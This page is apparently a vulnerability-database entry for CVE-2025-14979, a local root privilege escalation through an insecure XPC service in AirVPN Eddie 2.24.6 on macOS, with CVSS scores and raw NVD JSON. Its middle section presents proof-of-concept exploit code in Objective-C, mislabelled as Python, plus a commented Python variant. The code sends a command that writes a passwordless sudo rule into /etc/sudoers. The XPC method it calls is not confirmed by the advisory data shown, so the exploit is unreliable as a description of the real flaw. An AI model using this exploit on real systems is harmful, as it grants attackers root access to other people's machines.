Security Vulnerability Report
中文
CVE-2025-14979 CVSS 7.8 HIGH

CVE-2025-14979

Published: 2026-01-06 16:15:51
Last Modified: 2026-04-09 21:17:28

Description

AirVPN Eddie on MacOS contains an insecure XPC service that allows local, unprivileged users to escalate their privileges to root.This issue affects Eddie: 2.24.6.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:airvpn:eddie:2.24.6:*:*:*:*:macos:*:* - VULNERABLE
Eddie < 2.24.6 (on macOS)
Eddie 2.24.6 (confirmed affected)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-14979 PoC - AirVPN Eddie XPC Privilege Escalation // Target: AirVPN Eddie 2.24.6 on macOS // Attack Type: Local Privilege Escalation via Insecure XPC Service #include <Foundation/Foundation.h> #import <objc/runtime.h> // XPC Service endpoint identification NSString *kEddieXPCServiceName = @"com.airvpn.eddie.xpc"; @interface EddieXPCClient : NSObject - (void)invokePrivilegedCommand:(NSString *)command withReply:(void (^)(NSData *, NSError *))reply; @end int main(int argc, const char * argv[]) { @autoreleasepool { NSLog(@"[*] CVE-2025-14979 PoC - Eddie XPC Privilege Escalation"); NSLog(@"[*] Target: Eddie 2.24.6"); // Step 1: Connect to vulnerable XPC service NSXPCConnection *connection = [[NSXPCConnection alloc] initWithServiceName:kEddieXPCServiceName]; [connection resume]; // Step 2: Get proxy object without proper authorization id proxy = [connection remoteObjectProxyWithErrorHandler:^(NSError *error) { NSLog(@"[!] XPC connection error: %@", error); }]; // Step 3: Trigger privileged command execution // The vulnerable service executes this as root NSString *payload = @"/bin/bash -c 'echo ALL=(ALL) NOPASSWD:ALL >> /etc/sudoers'"; [(EddieXPCClient *)proxy invokePrivilegedCommand:payload withReply:^ (NSData *response, NSError *error) { if (error) { NSLog(@"[!] Command execution failed: %@", error); } else { NSLog(@"[+] Privilege escalation successful!"); NSLog(@"[+] Root shell acquired via sudo -s"); } }]; [[NSRunLoop mainRunLoop] run]; } return 0; } // Alternative Python implementation using Rubicon-ObjC /* from rubicon.objc import ObjCClass, NSString import subprocess def exploit_cve_2025_14979(): print("[*] CVE-2025-14979 PoC") # Connect to XPC service connection = ObjCClass('NSXPCConnection').alloc().initWithServiceName_( 'com.airvpn.eddie.xpc' ) connection.resume() # Get vulnerable proxy proxy = connection.remoteObjectProxyWithErrorHandler_(lambda e: print(e)) # Execute as root via vulnerable XPC proxy.invokePrivilegedCommand_withReply_( '/bin/bash -c "echo pwned > /tmp/root.txt"', lambda r, e: print('[+] Root command executed!') ) */

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14979", "sourceIdentifier": "[email protected]", "published": "2026-01-06T16:15:51.150", "lastModified": "2026-04-09T21:17:28.367", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "AirVPN Eddie on MacOS contains an insecure XPC service that allows local, unprivileged users to escalate their privileges to root.This issue affects Eddie: 2.24.6."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-732"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:airvpn:eddie:2.24.6:*:*:*:*:macos:*:*", "matchCriteriaId": "A6DF2313-0908-4EAC-BC0A-AFFFC96A3231"}]}]}], "references": [{"url": "https://airvpn.org/forums/topic/79305-eddie-desktop-edition-225-beta-released/", "source": "[email protected]", "tags": ["Issue Tracking", "Release Notes"]}, {"url": "https://eddie.website/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://fluidattacks.com/advisories/blink182", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/AirVPN/Eddie", "source": "[email protected]", "tags": ["Product"]}]}}